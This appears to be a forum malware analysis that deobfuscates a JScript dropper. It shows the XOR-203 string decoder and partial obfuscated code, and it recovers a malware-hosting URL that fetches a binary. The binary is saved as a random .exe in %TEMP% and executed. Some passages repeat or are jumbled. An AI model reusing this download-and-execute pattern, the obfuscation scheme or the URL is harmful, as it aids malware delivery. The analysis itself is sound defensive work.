var ZSGVJ=KPMSMGNMR+SUFPWP+
PXSIR[
MOTJV+IYGPGWZM+WPRSDY+AHIXJ+SOVWR+PUKVG
=> "substr"
]
(HLTHO, 2);
=> get two char from string to decode, at current index
=> (index,2)
=> example with "9CW98RA8JB9DA2XBBCBFWE5P98HA3BAETA7MA7F"
=> FIRST LOOP
=> ZSGVJ= "0x" +first_parameter.substr(index,2)
=> 0x9C hex => 156 decimal
var CMQLHAF=COJSPB ^ VEOSXK;
=> CMQLHAF = 156 XOR 203 = 87 decimal
CEXDQHZJ="C";=> ZSGVJ= "0x9C" => hex value
var COJSPB=parseInt(ZSGVJ); => 0x9C hex => 156 decimal
var CMQLHAF=COJSPB ^ VEOSXK;
=> CMQLHAF = 156 XOR 203 = 87 decimal
LKNKOVFE="d";
MYLRINFXQ="e";
WZFISKGY="r";
MFEYE="a";
OUNLIBUKT="o";
UFRKSQ="h";
QNBCQUK="C";
PDUTMK="m";
KXFXZULVP="r";
OYPESUBQW="o";
SVJHUXA="f";
DISGB+=String[SVJHUXA+KXFXZULVP+OUNLIBUKT+PDUTMK+QNBCQUK+UFRKSQ+MFEYE+WZFISKGY+CEXDQHZJ+OYPESUBQW+LKNKOVFE+MYLRINFXQ](CMQLHAF);
=> String["fromCharCode"](CMQLHAF);
=> DISGB+=String.fromCharCode(CMQLHAF);
=> 87 => "W"
Conclusion :
"9C
A loop retrieving 2 chars for the xor with 203, every 3 chars
With this string as example :
9C => 0x9C => 156 XOR 203 => 87 => W
98 => 0x98 => 152 XOR 203 => 83 => S
A8 => 0xA8 => 168 XOR 203 => 99 => c
B9 => 0xB9 => 185 XOR 203 => 114 => r
etc...
=> "WScript.Shell"98 => 0x98 => 152 XOR 203 => 83 => S
A8 => 0xA8 => 168 XOR 203 => 99 => c
B9 => 0xB9 => 185 XOR 203 => 114 => r
etc...
Now, we have all the elements to deobfuscate all parts
DVUNKGXA("98ZA8SB9MA2FBBYBFRA2KA5CACVE5O8DHA2ZA7RAEK98FB2XB8PBFHAEZA6S84KA9BA1TAENA8FBFY", VEOSXK)
"Scripting.FileSystemObject"
DVUNKGXA("98ZA8SB9MA2FBBYBFRA2KA5CACVE5O8DHA2ZA7RAEK98FB2XB8PBFHAEZA6S84KA9BA1TAENA8FBFY", VEOSXK);
"expandEnvironmentStrings"
DVUNKGXA("AEJB3YBBMAAAA5NAFA8ENA5BBDOA2BB9PA4CA5PA6CAERA5FBFT98GBFVB9OA2GA5TACHB8U", VEOSXK);
"%TEMP%"
DVUNKGXA("EEO9FC8EQ86E9BREEF", VEOSXK)
"GetTempName"
DVUNKGXA("8CHAEVBFI9FWAEJA6WBBJ85WAAKA6XAEK", VEOSXK);
"WinHttp.WinHttpRequest.5.1"
DVUNKGXA("E5LAEBB3TAES", VEOSXK);
".exe"
DVUNKGXA("A4VBBOAEGA5Z", VEOSXK);
"open"
DVUNKGXA("ACCAEWBFP", VEOSXK);
"get"
DVUNKGXA("A3IBFZBFSBBMF1EE4UE4MA7EA4XBFPA4DAEQA7DA3RA4FBFXB8TE5MBFGA4ZBBSE4LA7GA4UACIE5VBBJA3WBBJF4IADWF6KAECB9UB9RA4LB9HE5AB8SB2KB8B", VEOSXK);
"http: //lotoelhots.top/log.php?f=error.sys"
DVUNKGXA("98CAEVBFN99GAEYBARBEIAEVB8JBFW83JAEXAAKAFYAEMB9Z", VEOSXK);
"SetRequestHeader"
DVUNKGXA("9EGB8TAEHB9UE6H8AZACRAEKA5DBFW", VEOSXK);
"User-Agent"
DVUNKGXA("86WA4FB1YA2RA7JA7BAATE4JFEWE5JFBXEBKE3X9CKA2AA5RAFGA4TBCHB8VEBJ85W9FKEBYFDLE5ZFAMF0ZEBN9FBB9PA2DAFQAEEA5RBFFE4TFCIE5RFBEF0SEBFB9SBDGF1UFAHFAVE5JFBXE2LEBAA7PA2DA0RAEEEBT8CHAEUA8IA0VA4I", VEOSXK);
"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko"
DVUNKGXA("B8XAEKA5XAFL", VEOSXK);
"send"
DVUNKGXA("8AO8FC84Q8FC89QE5D98RBFFB9SAEFAATA6G", VEOSXK);
"ADODB.Stream"
DVUNKGXA("84JBBWAEJA5X", VEOSXK);
"Open"
DVUNKGXA("9FYB2MBBAAEN", VEOSXK);
"Type" (= 1)
DVUNKGXA("9CPB9CA2QBFDAEQ", VEOSXK);
"Write"
DVUNKGXA("99RAEFB8TBBGA4TA5GB8UAEH89VA4IAFWB2J", VEOSXK);
"ResponseBody"
LAST PART :
UAYPLY = "%TEMP%" + TempName + ".exe"
if (WPTGSVGX[DVUNKGXA("8DLA2ZA7MAEZ8ENB3AA2NB8BBFOB8B", VEOSXK)](UAYPLY))
"FileExists"
"SaveToFile"
HAZXEJDW[DVUNKGXA("88OA7CA4QB8DAER", VEOSXK)];
"Close"
if (!WPTGSVGX[DVUNKGXA("8DLA2ZA7MAEZ8ENB3AA2NB8BBFOB8B", VEOSXK)](UAYPLY))
not "FileExists"
"Exec"
3) CONCLUSION :if (WPTGSVGX[DVUNKGXA("8DLA2ZA7MAEZ8ENB3AA2NB8BBFOB8B", VEOSXK)](UAYPLY))
"FileExists"
WPTGSVGX[DVUNKGXA("8FBAEPA7DAEQBFDAER8DEA2RA7EAES", VEOSXK)](UAYPLY);
"DeleteFile"
HAZXEJDW[DVUNKGXA("98ZAAMBDAAEN9FDA4R8DFA2TA7GAEU", VEOSXK)](UAYPLY);"DeleteFile"
"SaveToFile"
HAZXEJDW[DVUNKGXA("88OA7CA4QB8DAER", VEOSXK)];
"Close"
if (!WPTGSVGX[DVUNKGXA("8DLA2ZA7MAEZ8ENB3AA2NB8BBFOB8B", VEOSXK)](UAYPLY))
not "FileExists"
WPTGSVGX[DVUNKGXA("8FBAEPA7DAEQBFDAER8DEA2RA7EAES", VEOSXK)](UAYPLY);
"DeleteFile"
ZJFHO[DVUNKGXA("8EVB3OAEHA8Z", VEOSXK)](UAYPLY);"DeleteFile"
"Exec"
Two important functions used :
- one for creating the object passed as a parameter string,
- the second to decode a String with a value (203) for the XOR part.
Summary :
=> Exec a file, downloaded from http: //lotoelhots.top/log.php?f=error.sys and saved to
%TEMP%\RandomTempName.exe
Example :
- one for creating the object passed as a parameter string,
- the second to decode a String with a value (203) for the XOR part.
Summary :
=> Exec a file, downloaded from http: //lotoelhots.top/log.php?f=error.sys and saved to
%TEMP%\RandomTempName.exe
Example :
C:\Users\DardiM\AppData\Local\Temp\rad1083E.tmp.exe
Payload :
6/57
https://www.virustotal.com/en/file/...775565ecf3d57bee898bdbba7ed0fcf0dee/analysis/
N.B.: I retrieved the payload, before the url get "unavailable" (type : binary)
https://www.virustotal.com/en/file/...775565ecf3d57bee898bdbba7ed0fcf0dee/analysis/
N.B.: I retrieved the payload, before the url get "unavailable" (type : binary)
Last edited: